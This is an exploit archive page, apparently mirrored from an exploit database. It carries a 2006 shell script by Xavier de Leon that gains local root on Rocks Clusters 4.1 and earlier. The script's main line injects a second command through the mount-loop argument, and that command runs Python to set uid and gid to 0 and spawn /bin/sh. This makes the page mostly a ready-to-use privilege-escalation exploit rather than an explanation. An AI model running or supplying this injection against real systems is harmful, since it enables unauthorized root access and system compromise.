Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit
# Published : 2006-07-15
# Author : Xavier de Leon
# Previous Title : Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit
# Next Title : Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)

#!/bin/sh
##############################################################################
##  rocksmountdirty.sh: Rocks release <=4.1 local root exploit
##  make sure 'mount-loop' is in your path for this to work.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl("/bin/sh", "/usr/sbin/httpd")'"

# www.Syue.com [2006-07-15]